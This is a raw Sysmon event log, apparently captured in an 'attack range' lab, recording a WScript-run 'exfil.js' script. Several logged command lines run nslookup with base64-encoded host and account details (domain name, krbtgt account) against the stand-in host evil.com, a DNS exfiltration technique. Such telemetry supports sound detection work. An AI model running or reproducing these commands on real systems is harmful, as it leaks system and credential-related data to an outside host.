14:21:46.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.761{2E1864BB-18E0-629A-6742-000000005F02}39762236C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-B845-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-18FA-629A-B845-000000005F02}4248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyep.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.761{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlexgk.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.746{2E1864BB-18FA-629A-B645-000000005F02}77366108C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B745-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B745-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.730{2E1864BB-18FA-629A-B545-000000005F02}48087588C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-B745-000000005F02}7984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.740{2E1864BB-18FA-629A-B745-000000005F02}7984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-B545-000000005F02}4808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlexgk.tmp 2>&1 10341000x8000000000000000214031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.695{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B645-000000005F02}7736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.692{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B645-000000005F02}7736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.676{2E1864BB-18FA-629A-B645-000000005F02}77366108C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B545-000000005F02}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B645-000000005F02}7736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B545-000000005F02}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-18E0-629A-6742-000000005F02}39765332C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-B545-000000005F02}4808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.665{2E1864BB-18FA-629A-B545-000000005F02}4808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlexgk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.661{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmjcjm.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.629{2E1864BB-18FA-629A-B345-000000005F02}74363388C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B445-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B445-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.614{2E1864BB-18FA-629A-B245-000000005F02}57767528C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-B445-000000005F02}2040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.625{2E1864BB-18FA-629A-B445-000000005F02}2040C:\Windows\System32\nslookup.exe10.0.14393.0 